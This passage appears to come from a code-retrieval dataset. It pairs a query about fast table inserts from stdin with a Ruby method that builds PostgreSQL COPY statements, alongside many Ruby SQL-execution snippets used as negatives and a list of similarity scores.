"def setup_connection(conn)\n conn = super(conn)\n statement(conn) do |stmt|\n connection_configuration_sqls.each{|sql| log_yield(sql){stmt.execute(sql)}}\n end\n conn\n end",
"def sql\n @parser.sql\n end",
"def sql\n @parser.sql\n end",
"def execute_sql\n ActiveRecord::Base.connection.execute(@sql)\n end",
"def query\n end",
"def display_query_sql(users)\n tag.p('SQL:') + tag.code(users.to_sql)\n end",
"def run\n basecmd = []\n basecmd << command(:psql)\n basecmd << \"-U\" unless @resource[:role].nil?\n basecmd << \"#{@resource[:role]}\" unless @resource[:role].nil?\n basecmd << \"-d\" unless @resource[:database].nil?\n basecmd << \"#{@resource[:database]}\" unless @resource[:database].nil?\n \n # We execute by default.\n execute = true\n unless @resource[:query].nil?\n cmd = basecmd\n cmd << '-qAtc'\n \n sqlcmd = \"#{@resource[:query]}\"\n \n cmd << sqlcmd\n \n raw, status = Puppet::Util::SUIDManager.run_and_capture(cmd, 'postgres')\n if status == 0\n execute = false # Got an ok result, so we'll evaluate.\n\n if ! @resource[:rows].nil?\n target_rows = Integer(@resource[:rows].gsub(/[^\\d]/,''))\n operand = @resource[:rows].gsub(/[\\d]/,'').chomp.downcase\n returned_rows = (raw.length <= 0 ? 0 : raw.lines.count)\n if operand.match(/lte|less than or equal|<=/)\n execute = true if returned_rows <= target_rows\n elsif operand.match(/gte|greater than or equal|>=/)\n execute = true if returned_rows >= target_rows\n elsif operand.match(/lt|less than|</)\n execute = true if returned_rows < target_rows \n elsif operand.match(/gt|greater than|>/)\n execute = true if returned_rows > target_rows\n else\n execute = true if returned_rows == target_rows\n end\n end\n else\n # We stop an execution if rows or result params are set\n # on the assumption that if you want to evaluate against criteria like those\n # you want to actually do so.\n execute = false if (! @resource[:rows].nil? or ! @resource[:result].nil?)\n end\n end\n \n unless execute == false\n cmd = basecmd\n if ! @resource[:command].nil?\n cmd << '-qAtc'\n \n sqlcmd = \"#{@resource[:command]}\"\n \n cmd << sqlcmd \n elsif ! @resource[:file].nil?\n cmd << '-qAtf'\n \n sqlcmd = \"#{@resource[:file]}\"\n \n cmd << sqlcmd\n else\n # Right now we send a warning. This should still trigger a refresh if you\n # want to use queries to conditionally do things for some insane reason.\n self.warning(\"Nothing to do.\")\n end\n \n raw, status = Puppet::Util::SUIDManager.run_and_capture(cmd, 'postgres')\n if status != 0\n self.fail(\"Error executing SQL - result #{raw}\")\n else\n @ran = true\n end\n else\n self.fail(\"Execution criteria failed. Failing to prevent dependant resources from executing.\")\n end\n end",
"def query; end",
"def log_connection_execute(conn, sql)\n conn.execute(sql)\n end",
"def exec__psql_cli_or_db_queries psql_db, db_queries=[nil]\n batch = psql_db_batch__cli_or_queries psql_db, db_queries\n batch_commands batch\n end",
"def source_sql\n system \"psql -d #{@base_name} -f #{@sql_path}\"\n end",
"def initialize(args)\n @sql = args[:sql] || nil\n \n #Mandatory args:\n req(:required => [:connection_name],\n :args_object => args)\n @dbh = Mysqladmin::Pool.connections[args[:connection_name]][:dbh]\n end",
"def initialize( db, sql )\n @db = db\n @sql = sql\n commence\n end",
"def connect(opts)\n c = super\n connection_pragmas.each{|s| log_connection_yield(s, c){c.execute(s)}}\n c\n end",
"def run_sql(sql_query)\n begin\n CONNECTION.execute(sql_query)\n rescue Exception => msg\n msg\n end\n end",
"def setup_connection(conn)\n conn = super(conn)\n statement(conn) do |stmt|\n connection_pragmas.each{|s| log_connection_yield(s, conn){stmt.execute(s)}}\n end\n conn\n end",
"def set_sql_query\n @sql_query = SqlQuery.find(params[:id])\n end",
"def run_query()\n return nil unless @query\n \n gres = @query.execute()\n if @filterClass \n fres = @filterClass.filter(gres)\n res = fres.kind_of?(Array) ? fres.join(\"\\n\") : fres.to_s\n elsif @filterBlock \n fres = @filterBlock.call(gres)\n res = fres.kind_of?(Array) ? fres.join(\"\\n\") : fres.to_s\n else\n res = fres.result_s\n end\n res\n end",
"def statements\n @statements ||= statements_as_subject + statements_as_predicate + statements_as_object\n end",
"def execute(sql, name = nil) #:nodoc:\n log(sql, name) { @connection.exec sql }\n end",
"def generate_query\n unless databases.nil?\n databases.each do |db|\n create_query[db] = [\"create table #{tablename} (\"]\n end\n csv_column_datatypes.each do |header, datatype|\n append_to_query = build_query_for_datatype(header, datatype)\n append_to_query.each do |key, value|\n create_query[key].push(value)\n end\n end\n prepare_sql_statements\n prepare_import_csv\n # Pass the prepared statements to options varaible.\n # Which gets passed on to print_metadata_analysis\n options[:create_query] = create_query\n options[:import_query] = import_query\n end\n print_metadata_analysis\n end",
"def sql_string\n self\n end",
"def index\n @my_sqls = MySql.all\n end",
"def sql_state; end",
"def run_sql(query)\n raw_run_sql(query)\n end",
"def queries\n @requested_queries.map { |key| Gquery.get(key) }.compact\n end",
"def _execute(sql, name = nil)\n @connection.execute(sql)\n end",
"def execute(sql)\r\n\t\t@connection.Execute(sql)\r\n\tend",
"def request_sql(host,port,extra_condition)\n\t\tWmapRequest.find(:all, :conditions => [\"wmap_requests.host = ? AND wmap_requests.port = ? #{extra_condition}\",host,port])\n\tend",
"def all() \n @sql = @default_sql\n query(@sql) unless @a\n @a\n end",
"def sql_on_all_sids( command, parameters = {})\n results = []\n oratab = OraTab.new\n oratab.running_database_sids.each do |sid|\n results = results + sql(command, {:sid => sid}.merge(parameters))\n end\n results\n end",
"def set_my_sql\n @my_sql = MySql.find(params[:id])\n end",
"def initialize(sql)\n @sql = sql\n end",
"def query_script(example, sql, log_name=nil)\n log_name ||= 'Run SQL Script'\n\n debuggable_sql = SqlPreprocessor.debuggable_sql(sql)\n executable_sql = SqlPreprocessor.executable_sql(sql, example)\n\n example.metadata[:sql] += ((example.metadata[:sql] == '' ? '' : \"\\n\\n\") + \"-- #{log_name.split(/\\r\\n|\\n/).join(\"\\n-- \")}\\n#{debuggable_sql}\")\n application.query_script(executable_sql)\n end",
"def execute_query(sql, args)\n @db.log_connection_yield(sql, self, args){args ? async_exec(sql, args) : async_exec(sql)}\n end",
"def execute(sql)\n @db.send(:_execute, self, sql, :log=>false) \n end",
"def execute_query(sql, args)\n\t\t\t\t\t@db.log_connection_yield(sql, self, args){args ? self.async_exec(sql, args) : self.async_exec(sql)}\n\t\t\t\tend",
"def query(sql)\n if NB.neverblocking? && NB.reactor.running?\n send_query sql\n NB.wait(:read, IO.new(socket))\n get_result\n else\n super(sql)\n end\n end",
"def execute(sql, name = nil) \n # Only skip select statements from logging \n unless /^(select|show|begin|commit)/i.match(sql.strip) \n\t\tFile.open( File.join(RAILS_ROOT, 'db', 'ddl.sql'),'a') {|f|\n\t\t\ttemp_sql = sql.gsub(\"\\n\",\"\") \n\t\t\ttemp_sql = temp_sql + ';' if adapter_name != 'IBM_DB2' or adapter_name != 'IBM_DB'\n\t\t\tf.puts temp_sql\n\t\t}\n end\n\t old_execute sql, name\n end",
"def execute(sql, name = nil)\n # lol no, won't hit connection pool just for this one\n #\n # if @connection\n # # make sure we carry over any changes to ActiveRecord::Base.default_timezone that have been\n # # made since we established the connection\n # @connection.query_options[:database_timezone] = ActiveRecord::Base.default_timezone\n # end\n\n log(sql, name) { @connection.query(sql) }\n end",
"def statements\n @statements ||= statements_as_subject + statements_as_predicate + statements_as_object\n end",
"def prepare(name, sql)\n check_disconnect_errors{super}\n end",
"def prepared_sql\n case prepared_type\n when :select, :all, :each\n # Most common scenario, so listed first.\n select_sql\n when :first\n clone(:limit=>1).select_sql\n when :insert_select\n insert_select_sql(*prepared_modify_values)\n when :insert, :insert_pk\n insert_sql(*prepared_modify_values)\n when :update\n update_sql(*prepared_modify_values)\n when :delete\n delete_sql\n else\n select_sql\n end\n end",
"def prep_sql_for_run\n self.sql = sql.strip\n self.sql = sql[0..-2] if sql.last == ';'\n self.sql = sql.dup\n end",
"def exec_query(sql, name = 'SQL', binds = [])\n execute(sql, name, binds)\n end",
"def query_options\n @query_options ||= @connection.query_options\n end",
"def execute(sql, name = nil, binds = []) #:nodoc:\r\n if name == :skip_logging\r\n query(sql, binds)\r\n else\r\n log(sql, name, binds) { query(sql, binds) }\r\n end\r\n end",
"def run_sql(sql_query)\n\tconn = PG.connect(dbname: 'first_crud_app')\n\tresult = conn.exec(sql_query)\n\tconn.close\n\tresult\nend",
"def ps\n sql = %q(\n select\n procpid,\n application_name as source,\n age(now(),query_start) as running_for,\n waiting,\n current_query as query\n from pg_stat_activity\n where\n current_query <> '<insufficient privilege>'\n AND current_query <> '<IDLE>'\n and procpid <> pg_backend_pid()\n order by 3 desc\n )\n\n exec_sql(sql, find_uri)\n end",
"def execute(sql)\n @database_handle.execute(sql)\n end",
"def before_query(query)\n Rails.logger.info(\"[QUERY BEGIN] >>> #{Time.now.to_i}\")\n end",
"def log_current_test_query\n qc_current_inspection = get_current_inspection_record( session[:user_id].id, session[:qc_inspection_type_code] )\n if qc_current_inspection.nil?\n ActiveRecord::Base.connection.execute(\"INSERT INTO qc_current_inspections\n (user_id, qc_inspection_type_code, qc_tests_query, tests_columns_list)\n VALUES(#{session[:user_id].id}, '#{session[:qc_inspection_type_code]}',\n '#{dm_session[:search_engine_query_definition].gsub(/'/, \"''\")}', '#{session[:columns_list].to_yaml}')\")\n else\n ActiveRecord::Base.connection.execute(ActiveRecord::Base.extend_update_sql_with_request(\"UPDATE qc_current_inspections\n SET qc_tests_query = '#{dm_session[:search_engine_query_definition].gsub(/'/, \"''\")}',\n tests_columns_list = '#{session[:columns_list].to_yaml}'\n WHERE user_id = #{session[:user_id].id} AND qc_inspection_type_code = '#{session[:qc_inspection_type_code]}' \"))\n end\n end",
"def all_dbs\n @conn.query({url_path: \"_all_dbs\", method: :get})\n end"
] |
[
"0.6558",
"0.6437771",
"0.6432272",
"0.64197713",
"0.64197713",
"0.6389099",
"0.63364065",
"0.6318091",
"0.63028187",
"0.62802106",
"0.62638634",
"0.6246098",
"0.6229926",
"0.61795676",
"0.61747974",
"0.61747974",
"0.6153917",
"0.6148627",
"0.6138928",
"0.6134228",
"0.61048144",
"0.60947055",
"0.60911334",
"0.6090994",
"0.60886854",
"0.60334396",
"0.59891164",
"0.5976449",
"0.5923984",
"0.5919582",
"0.5915083",
"0.5892746",
"0.58817804",
"0.5875223",
"0.58607084",
"0.5857267",
"0.5855898",
"0.58350706",
"0.5808401",
"0.5800635",
"0.5798429",
"0.5784897",
"0.5776502",
"0.5776502",
"0.5771748",
"0.57515854",
"0.5748659",
"0.5733168",
"0.5729824",
"0.5729824",
"0.57224363",
"0.57080775",
"0.5679637",
"0.56737006",
"0.5663665",
"0.56491375",
"0.56394255",
"0.56360215",
"0.5628278",
"0.5627319",
"0.5603103",
"0.559621",
"0.55917823",
"0.5589617",
"0.5580673",
"0.55752265",
"0.5567928",
"0.55673707",
"0.55673665",
"0.556547",
"0.556466",
"0.5559881",
"0.555549",
"0.5553651",
"0.5547491",
"0.5539463",
"0.55323046",
"0.55291414",
"0.55270606",
"0.5526022",
"0.55225307",
"0.5507866",
"0.550485",
"0.55031085",
"0.5498581",
"0.54940355",
"0.5494002",
"0.54938793",
"0.54810447",
"0.54783064",
"0.5470056",
"0.5466946",
"0.5451462",
"0.54490745",
"0.54458594",
"0.5443188",
"0.5437745",
"0.54263955",
"0.54262877",
"0.5417245"
] |
0.57855695
|
41
|
SQL for doing a fast table insert from stdin.
|
def copy_into_sql(table, opts)
  sql = String.new
  sql << "COPY #{literal(table)}"
  if cols = opts[:columns]
    sql << literal(Array(cols))
  end
  sql << " FROM STDIN"
  if opts[:options] || opts[:format]
    sql << " ("
    sql << "FORMAT #{opts[:format]}" if opts[:format]
    sql << "#{', ' if opts[:format]}#{opts[:options]}" if opts[:options]
    sql << ')'
  end
  sql
end
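# Example (a sketch; the table, columns, and options are hypothetical, and
# identifier quoting follows the adapter's literal rules):
#
# copy_into_sql(:events, columns: [:id, :name], format: :csv, options: "HEADER")
# # => COPY "events"("id", "name") FROM STDIN (FORMAT csv, HEADER)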
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def format table, keys, values\n <<-SQL\nCOPY #{table} (#{keys.join(', ')}) FROM stdin;\n#{values.collect { |row| row.join \"\\t\" }.join \"\\n\"}\n\\\\.\n SQL\n end",
"def fast_insert(rows, base_cmd, end_cmd = '')\n RawDB.fast_insert(db, rows, base_cmd, end_cmd)\n end",
"def row_sql_insert(table_name, table_struct)\n fields = get_fields(table_struct)\n\n sql = <<-EOF\n INSERT INTO `#{DBNAME}`.`#{table_name}` (\n #{fields.collect { |f| \"`#{f}`\" }.join(\", \")}\n )\n VALUES (\n #{fields.collect { |f| \"'%s'\" }.join(\", \")}\n );\n EOF\n\n sql\nend",
"def insert_into_sql(sql)\n sql << \" INTO \"\n if (f = @opts[:from]) && f.length == 1\n identifier_append(sql, server_version >= 90500 ? f.first : unaliased_identifier(f.first))\n else\n source_list_append(sql, f)\n end\n end",
"def generate_pg_insert_query(table_name, keys, rows)\n \"INSERT INTO #{table_name}(#{keys.map { |i| \"\\\"#{i}\\\"\" }.join(',')}) VALUES(#{keys.map { |i| rows[i] == nil ? 'NULL' : \"'\" + pg_conn.escape_string(rows[i]) + \"'\" }.join(',')});\\n\"\n end",
"def insert_data(output, db, table)\n result = query(db, \"SELECT * FROM #{table}\", \"hash\")\n changes = false\n result.each do |row|\n to_insert(output, table, row)\n changes = true\n end\n output << \"\\n\" if changes\n end",
"def dump_insert_multi(io, table_obj, rows)\n print \"Inserting #{rows.length} into #{table_obj.name}.\\n\" if @debug\n sqls = @args[:db].insert_multi(table_obj.name, rows, :return_sql => true, :keys => @keys)\n sqls.each do |sql|\n io.write(\"#{sql};\\n\")\n end\n \n rows.clear\n \n #Ensure garbage collection or we might start using A LOT of memory.\n GC.start\n end",
"def build_sql(value_str)\n \"COPY #{value_str} FROM STDIN WITH (FORMAT csv, DELIMITER E'\\x0B')\"\n end",
"def raw_sql_insert\r\n client = self.connect\r\n dataset = client[:fleet]\r\n \r\n db_str = \"LOAD DATA INFILE '/home/user/fleet.csv' \" +\r\n \"INTO TABLE fleet \" +\r\n \"FIELDS TERMINATED BY '\\t' \" +\r\n \"IGNORE 1 LINES \" +\r\n \"(@dummy, name, description);\"\r\n \r\n # raw mysql query.\r\n client.run(db_str)\r\n \r\n # cleanup\r\n puts \"raw sql insert\"\r\n client.disconnect\r\n \r\n return true\r\n end",
"def write_weight_table()\n puts <<SQL\ndrop table if exists WEIGHT;\ndrop index if exists id_idx;\ndrop index if exists sequence_idx;\n\ncreate table WEIGHT(\n id char(5) not null,\n sequence char(2) not null,\n amount float not null,\n description varchar(84) not null,\n grams float not null,\n data_points int default null,\n std_deviation float default null,\n primary key (id, sequence)\n);\n\ncreate index id_idx on WEIGHT(id);\ncreate index sequence_idx on WEIGHT(sequence);\n\nSQL\n\n read_data('WEIGHT.txt') do |fields|\n puts make_insert_statement('WEIGHT', fields,\n 'id', 'sequence', 'amount', 'description', 'grams',\n 'data_points', 'std_deviation')\n end\nend",
"def dump_insert_multi(io, table_obj, rows)\n debug \"Inserting #{rows.length} into #{table_obj.name}.\"\n sqls = @export_db.insert_multi(\n table_obj.name,\n rows,\n replace_line_breaks: true,\n return_sql: true,\n keys: @keys\n )\n sqls.each do |sql|\n io.write(\"#{sql};\\n\")\n end\n\n rows.clear\n\n # Ensure garbage collection or we might start using A LOT of memory.\n GC.start\n end",
"def insert_into(table, data)\n\t\tkeys = \"(#{data.keys.join(', ')})\"\n\t\tvalues = \"(#{data.values.map{ |value| \"'#{value}'\" }.join(', ')})\"\n\t\texecute_with_retry \"INSERT INTO #{table} #{keys} VALUES #{values}; \"\n\tend",
"def to_inserts(args={})\n args[:table] ||= Pathname.new(@filename).basename.to_s.downcase.gsub(/\\W/, '_')\n args[:before] ||= @@defaults[:before]\n args[:after] ||= @@defaults[:after]\n insert_sql = args[:ignore] ? 'insert ignore' : 'insert'\n if args[:bulk]\n args[:before] += \"#{insert_sql} into #{args[:table]} values\"\n args[:values_glue] ||= \", \"\n args[:row_format] ||= \" (%s)\"\n args[:row_glue] ||= \",\\n\"\n else\n args[:before] ||= \"\"\n args[:values_glue] ||= \", \"\n args[:row_format] ||= \"#{insert_sql} into #{args[:table]} values(%s)\"\n args[:row_glue] ||= \";\\n\"\n end\n to_any args\n end",
"def db_insert table, fields= {}\n #client = Mysql2::Client.new(:host => \"localhost\", :username => \"root\", :password => \"toor\", :database => \"filesorter\")\n @query= \"INSERT INTO `#{table}` (`#{fields.keys.join('`, `')}`) VALUES ('\"+fields.values.join(\"', '\")+\"');\"\n do_query\n end",
"def to_bulk_insert_script\n s = TRANSACTION_START[db_type].dup\n s << \"\\n\"\n insert_command = rows.first.bulk_insert_str\n\n rows.each_slice(500) do |sliced_rows|\n s << insert_command\n s << sliced_rows.map {|row| row.bulk_insert_values_str(db_type) }.join(\",\\n\")\n s << \"#{SqlRow::STATEMENT_TERMINATOR[db_type]}\\n\"\n end\n\n s << \"#{TRANSACTION_END[db_type]}\\n\"\n s\n end",
"def write_food_group_table()\n puts <<SQL\ndrop table if exists FOOD_GROUP;\ncreate table FOOD_GROUP(\n id char(5) not null,\n description varchar(60) not null,\n primary key(id)\n);\nSQL\n\n read_data('FD_GROUP.txt') do |fields|\n puts make_insert_statement('FOOD_GROUP', fields, 'id', 'description')\n end\nend",
"def sql_insert(record)\n flds, vals = parse_fldsvalues(record)\n ph = vals.map{|x| placeholder }\n\n sql = %Q|insert into #{quoted_table}\n ( #{flds.join ','} )\n output inserted.#{quote_field id_fld}\n values( #{ph.join ','} );|\n\n [sql, vals]\n end",
"def exec_insert(sql, name, binds)\n exec_query(sql, name, binds)\n end",
"def to_insert(output, table, row)\n columns = @columns[table].map {|i| i[0] }.join(',')\n values = map_values(row, @columns[table])\n output << \"INSERT INTO #{table} (#{columns}) VALUES (#{values});\\n\"\n end",
"def generate_insert tab_name, argv\n\n\t\t\t\t# Attribute of table.\n\t\tattribute = \"\"\n\t\tattribute << \"id\"\n\t\ti = 0\n\t\targv.each do |k,v|\n\t\t\tif i == 0 and argv.length != 0\n\t\t\t \tattribute << \",\"\n\t\t\t end\n\t\t\tattribute << k\n\t\t\ti = i.to_i + 1\n\t\t\tif i != argv.length\n\t\t\t\tattribute << \",\"\n\t\t\tend\n\t\tend\n\t\t\t\t# Values of the Attributes.\n\t\tval = []\n\t\tval << \"NULL\"\n\t\ti = 0\n\t\tif argv.length != 0\n\t\t\tbegin\n\t\t\t\tval << \"\\\"#{argv[argv.keys[i]]}\\\"\"\n\t\t\t\ti = i.to_i + 1 \t\t\n\t\t\tend while i < argv.length.to_i\t\n\t\tend\t\t\n\n\t\tif argv.length == 0\n\t\t\tquery = \" INSERT INTO #{tab_name}(#{attribute}) VALUES (#{val * \"\"}) \"\n\t\t\treturn query\n\t\telse\n\t\t\tquery = \" INSERT INTO #{tab_name}(#{attribute}) VALUES (#{val * \",\"}) \"\n\t\t\treturn query\n\t\tend\n\tend",
"def import_csv_file(db, encoding, file, table)\n verbose \"Reading the header row.\"\n row_num = 0\n\n # Decide whether to get the CSV data from a file or STDIN\n if file == ''\n csv = CSV($stdin)\n if table == ''\n table = 'stdin'\n end\n else\n csv = CSV.open(file, encoding:encoding)\n end\n\n # Process each line of the CSV data\n csv.each do |row|\n # header row\n if row_num == 0\n verbose \"Columns are: #{row.inspect}\"\n\n column_defs = \"\"\n column_names = \"\"\n column_placeholders = \"\"\n\n row.each do |column|\n column_defs << \"#{column} VARCHAR, \"\n column_names << \"#{column}, \"\n column_placeholders << \"?, \"\n end\n\n # Remove the comma after last column\n column_defs.sub!(/,\\ \\Z/, '')\n column_names.sub!(/,\\ \\Z/, '')\n column_placeholders.sub!(/,\\ \\Z/, '')\n\n verbose \"Creating the #{table} table:\"\n create_table_query = \"CREATE TABLE IF NOT EXISTS #{table} (#{column_defs})\"\n verbose \"#{create_table_query};\"\n db.execute create_table_query\n\n verbose \"Prepared statement is:\"\n prepared_statement = \"INSERT INTO #{table} (#{column_names}) VALUES (#{column_placeholders})\"\n verbose \"#{prepared_statement};\"\n @insert = db.prepare(prepared_statement)\n # non-header rows\n else\n verbose \"Inserting row #{row_num}.\"\n @insert.execute(row)\n end\n row_num += 1\n end\nend",
"def exec_insert(sql, name, binds)\n exec_query(sql, name, binds)\n end",
"def copy_to(db, args = {})\r\n data[\"tables\"].each do |table|\r\n table_args = nil\r\n table_args = args[\"tables\"][table[\"name\"].to_s] if args and args[\"tables\"] and args[\"tables\"][table[\"name\"].to_s]\r\n next if table_args and table_args[\"skip\"]\r\n table.delete(\"indexes\") if table.key?(\"indexes\") and args[\"skip_indexes\"]\r\n db.tables.create(table[\"name\"], table)\r\n \r\n limit_from = 0\r\n limit_incr = 1000\r\n \r\n loop do\r\n ins_arr = []\r\n q_rows = self.select(table[\"name\"], {}, {\"limit_from\" => limit_from, \"limit_to\" => limit_incr})\r\n while d_rows = q_rows.fetch\r\n col_args = nil\r\n \r\n if table_args and table_args[\"columns\"]\r\n d_rows.each do |col_name, col_data|\r\n col_args = table_args[\"columns\"][col_name.to_s] if table_args and table_args[\"columns\"]\r\n d_rows[col_name] = \"\" if col_args and col_args[\"empty\"]\r\n end\r\n end\r\n \r\n ins_arr << d_rows\r\n end\r\n \r\n break if ins_arr.empty?\r\n \r\n db.insert_multi(table[\"name\"], ins_arr)\r\n limit_from += limit_incr\r\n end\r\n end\r\n end",
"def make_insert(table, columns, fields, row)\n statement = \"INSERT INTO #{table['name']} (#{fields.join(',')}) VALUES (\"\n values = []\n fields.each do |field|\n values << make_val(row[field], columns[field])\n end\n statement << \"#{values.join(',')});\\n\"\n statement\n end",
"def execute_insert(sql, opts=OPTS)\n _execute(sql, opts){|conn| log_connection_yield(sql, conn){conn.execute_batch(sql)}; conn.last_insert_rowid}\n end",
"def gen_insert_file(a1, a2, a3, a4, a5, a6)\r\n t = get_cur_time\r\n $ins.puts \"INSERT IGNORE INTO activities (f_homepage,start_city,end_city,start_time,end_time,remarks,created_at,beauty) VALUES ('%s','%s','%s','%s','%s','%s','%s',107);\" % [a1, a2, a3, a4, a5, a6, t]\r\nend",
"def db_insert(image_dataset_id)\n ####\"INSERT INTO raw_image_files\n ####(filename, header_reader, file_type, timestamp, source, rmr_number, series_description, \n ####gender, num_slices, slice_thickness, slice_spacing, reconstruction_diameter, \n ####acquisition_matrix_x, acquisition_matrix_y, rep_time, bold_reps, created_at, updated_at, image_dataset_id)\n ####VALUES ('#{@filename}', '#{@hdr_reader}', '#{@file_type}', '#{@timestamp.to_s}', '#{@source}', '#{@rmr_number}', \n ####'#{@series_description}', '#{@gender}', #{@num_slices}, #{@slice_thickness}, #{@slice_spacing}, \n #### #{@reconstruction_diameter}, #{@acquisition_matrix_x}, #{@acquisition_matrix_y}, #{@rep_time}, \n #### #{@bold_reps}, '#{DateTime.now}', '#{DateTime.now}', #{image_dataset_id})\" \n puts \"Old no raw_image_files table\"\n end",
"def execute_insert(sql, opts={})\n synchronize(opts[:server]) do |conn|\n conn.execute(sql)\n insert_result(conn, opts[:table], opts[:values])\n end\n end",
"def exec_insert(sql, name = nil, binds = [], pk = nil, sequence_name = nil)\n exec_query(sql, name, binds)\n end",
"def ins table, col, val\n pst = @con.prepare 'INSERT INTO ' + s(table) + '(' + s(col) + ') VALUES(?)'\n pst.execute s(val)\n #puts 'INSERT INTO ' + s(table) + '(' + s(col) + ') VALUES(' + s(val) + ')'\n end",
"def copy_table_sql(table, opts)\n if table.is_a?(String)\n table\n else\n if opts[:options] || opts[:format]\n options = String.new\n options << \" (\"\n options << \"FORMAT #{opts[:format]}\" if opts[:format]\n options << \"#{', ' if opts[:format]}#{opts[:options]}\" if opts[:options]\n options << ')'\n end\n table = if table.is_a?(::Sequel::Dataset)\n \"(#{table.sql})\"\n else\n literal(table)\n end\n \"COPY #{table} TO STDOUT#{options}\"\n end\n end",
"def create_table\n puts \"Creating table >> PEOPLE\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def create_table\n puts \"Creating people table\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def obfuscate(input_io, output_io)\n # We assume that every INSERT INTO line occupies one line in the file, with no internal linebreaks.\n input_io.each do |line|\n if regex_result = INSERT_REGEX.match(line)\n table_name = regex_result[1].to_sym\n columns = regex_result[2].split(/`\\s*,\\s*`/).map { |col| col.gsub('`',\"\").to_sym }\n if config[table_name]\n output_io.puts obfuscate_bulk_insert_line(line, table_name, columns)\n else\n output_io.write line\n end\n else\n output_io.write line\n end\n end\n end",
"def exec_insert(sql, name = nil, binds = []) #:nodoc:\r\n log(sql, \"insert\", binds) { query(sql, binds) }\r\n end",
"def raw_sql(record)\n record.class.arel_table.create_insert.tap do |insert_manager|\n insert_manager.insert(insert_values(record))\n end.to_sql\n end",
"def generate_insert\n @binds = Array.new\n @insert_statement = \"insert into #{fully_qualified_table_name} (\"\n @insert_statement << column_details.keys.sort.map { |k| column_detail(k).column_name }.join(',')\n @insert_statement << ') values ('\n @insert_statement << column_details.keys.sort.map { |k|\n \":#{k}\"\n }.join(',')\n column_details.keys.sort.each { |k|\n if @column_values[k] == nil\n @binds.push [column_type_to_ruby_type(column_details[k]), nil]\n else\n @binds.push @column_values[k]\n end\n }\n @insert_statement << ')'\n @insert_statement\n end",
"def insert!(*rows)\n Mao.sql(with_options(:insert => rows.flatten).sql) do |pg_result|\n if @options[:returning]\n pg_result.map {|result| Mao.normalize_result(result, @col_types)}\n else\n pg_result.cmd_tuples\n end\n end\n end",
"def copy_statement(table_name, options = {})\n format_options = replication.csv? ? \"CSV\" : \"GZIP DELIMITER ',' ESCAPE REMOVEQUOTES\"\n sql = <<-CS\n COPY #{table_name} from '#{import_file}' #{\"NOLOAD\" if options[:noload]}\n REGION '#{RailsRedshiftReplicator.s3_bucket_params[:region]}'\n CREDENTIALS 'aws_access_key_id=#{RailsRedshiftReplicator.aws_credentials[:key]};aws_secret_access_key=#{RailsRedshiftReplicator.aws_credentials[:secret]}'\n #{format_options}\n #{copy_options}\n CS\n sql.squish\n end",
"def insert_by_data data, table\n sql = \"insert into #{table} \"\n case data\n when Array\n data.each do |d|\n insert_by_data(d, table)\n end\n when Hash\n columns = data.keys.to_s.gsub('[','(').gsub(']',')').gsub('\"','')\n values = data.values.to_s.gsub('[','(').gsub(']',')').gsub('nil','NULL')\n sql = sql + columns + \" values \" + values\n query(sql)\n end\n end",
"def _construct_multiple_insert_sql(table, fields, rows)\n \n return nil if table.nil? || fields.nil? || rows.nil?\n \n insert_sql = \"insert into #{table} ( #{fields.join(\", \")} ) values\"\n x = 0\n \n rows.each do |row|\n insert_sql += \",\" if x > 0\n insert_sql += \" (\"\n y = 0\n \n row.each do |value|\n insert_sql += \",\" if y > 0\n insert_sql += _construct_sql_value(value)\n y += 1\n end\n \n insert_sql += \")\"\n \n x += 1\n end\n \n insert_sql\n \n end",
"def write_nutrient_definition_table()\n puts <<SQL\ndrop table if exists NUTRIENT_DEFINITION;\ncreate table NUTRIENT_DEFINITION(\n id char(3) not null,\n units varchar(7) not null,\n tagname varchar(20) default null,\n description varchar(60) default null,\n decimal_places char(1) default null,\n sort_order int default null,\n primary key (id)\n);\nSQL\n\n read_data('NUTR_DEF.txt') do |fields|\n puts make_insert_statement('NUTRIENT_DEFINITION', fields,\n 'id', 'units', 'tagname', 'description',\n 'decimal_places', 'sort_order')\n end\nend",
"def create_products_table\n c = PGconn.new(:host => \"localhost\", :dbname => dbname)\n c.exec %q{\n CREATE TABLE products (\n id SERIAL PRIMARY KEY,\n name varchar(255),\n price decimal,\n description text\n );\n }\n c.close\nend",
"def dump_table(io, table_obj)\n #Get SQL for creating table and add it to IO.\n sqls = @args[:db].tables.create(table_obj.name, table_obj.data, :return_sql => true)\n sqls.each do |sql|\n io.write(\"#{sql};\\n\")\n end\n \n \n #Try to find a primary column in the table.\n prim_col = nil\n table_obj.columns do |col|\n if col.primarykey?\n prim_col = col\n break\n end\n end\n \n \n #Set up rows and way to fill rows.\n rows = []\n block_data = proc do |row|\n rows << row\n @rows_count += 1\n \n if rows.length >= 1000\n self.update_status\n self.dump_insert_multi(io, table_obj, rows)\n end\n end\n \n \n #If a primary column is found then use IDQuery. Otherwise use cloned unbuffered query.\n args = {:idquery => prim_col.name.to_sym} if prim_col\n \n \n #Clone the connecting with array-results and execute query.\n @args[:db].clone_conn(:result => \"array\") do |db|\n db.select(table_obj.name, nil, args, &block_data)\n end\n \n \n #Dump the last rows if any.\n self.dump_insert_multi(io, table_obj, rows) if !rows.empty?\n end",
"def execute_insert(sql, opts=OPTS)\n execute(sql, opts.merge(:meth=>:autoid))\n end",
"def multi_insert_sql(columns, values)\n table = quote_identifier(@opts[:from].first)\n columns = literal(columns)\n values.map do |r|\n \"INSERT INTO #{table} #{columns} VALUES #{literal(r)}\"\n end\n end",
"def execute(sql)\n tmp = Digest::MD5.hexdigest(sql)\n tmp_path = \"#{TMP_DIR}/#{tmp}\"\n File.write tmp_path, sql \n scp_upload! tmp_path, tmp_path \n result = C.exec! \"psql -A -t -d #{TMP_DB} -f #{tmp_path}\"\n C.exec! \"rm #{tmp_path}\"\n File.delete tmp_path\n result\nend",
"def create_movies_table\n c = connect\n # this is another way to write a string, using %q{}\n c.exec %q{ \n CREATE TABLE movies (\n id SERIAL PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
